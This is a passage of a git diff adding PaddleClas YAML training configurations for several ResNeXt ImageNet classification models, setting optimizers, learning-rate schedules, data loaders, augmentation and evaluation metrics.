+ device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + 
decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00018 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_32x4d.yaml new file mode 100644 index 0000000..5cfb972 --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: 
docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_64x4d.yaml new file mode 100644 index 0000000..a959073 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_vd_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + 
name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_32x4d.yaml new file mode 100644 index 0000000..2d81048 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt50_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + 
weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_64x4d.yaml 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_64x4d.yaml new file mode 100644 index 0000000..38fa51e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt50_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + 
batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_32x4d.yaml new file mode 100644 index 0000000..466dfb3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt50_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 
1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_64x4d.yaml new file mode 100644 index 0000000..d2a2f86 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture 
+Arch: + name: ResNeXt50_vd_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x16d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x16d_wsl.yaml new file mode 100644 index 0000000..792311a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x16d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x16d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 
+ mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x32d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x32d_wsl.yaml new file mode 100644 index 0000000..a943ebb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x32d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x32d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x48d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x48d_wsl.yaml new file mode 100644 index 0000000..7f8fa72 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x48d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + 
eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x48d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + 
order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x8d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x8d_wsl.yaml new file mode 100644 index 0000000..3266c34 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x8d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x8d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 
cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + 